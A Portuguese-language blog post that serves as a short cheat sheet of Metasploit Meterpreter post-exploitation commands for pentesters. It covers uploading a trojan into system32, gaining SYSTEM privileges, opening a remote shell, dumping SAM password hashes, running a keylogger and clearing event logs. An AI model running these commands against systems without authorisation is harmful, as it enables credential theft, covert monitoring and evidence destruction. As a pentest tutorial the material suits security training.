Metasploit framework –Meterpreter

MeterPreter é um interpretados de comandos do metasploit framework.

Uma vez comprometido o sistema com um exploit você provavelmente irá interagir com o sistema. É nessa hora que entra em ação o meterpreter

No artigo anterior Metasploit, umas das melhores ferramentas de pentest eu passo alguns dos comandos mais básicos da solução junto com um vídeo do youtube onde acabou usando em determinado momento o “meterpreter“.

Comandos básicos do meterpreter

Listar arquivos
meterpreter > ls

Copiar um arquivo
meterpreter > download c:\\boot.ini

Enviar um arquivo
meterpreter > upload evil_trojan.exe c:\\windows\\system32

Visualizar informações de rede
meterpreter > ipconfig

Exibir qual o usuários está executando o Meterpreter
meterpreter > getuid

⭐️ Ter acesso como system
meterpreter > getsystem

Ganhar privilegios
meterpreter > user priv

Executar um comando na maquina remota
meterpreter > execute -f cmd.exe -i –H

⭐️ Usar o shell (prompt) remoto
meterpreter > shell

Exibir o tempo de ociosidade do sistema remoto
meterpreter > idletime

⭐️ Exibir a lista do banco de dados SAM usando um POST do Mestasploit
meterpreter > run post/windows/gather/hashdump

Iniciar um keylogger nativo do meterpreter
meterpreter > keyscan_start

Para o keylogger
meterpreter > keyscan_stop

Analisar o que foi capturado
meterpreter > keyscan_dump

Limpar eventos
clearev 


Mais informações você encontra na série da Offensive Security https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

Anúncio

Sobre Daniel Donda 549 Artigos
Olá, meu nome é Daniel Donda e sou especialista em cibersegurança, autor de livros, professor e palestrante. Saiba mais

1 Trackback / Pingback

  1. Metasploit – Uma das melhores ferramentas de Pentest – Daniel Donda

Faça um comentário

Seu e-mail não será divulgado.


*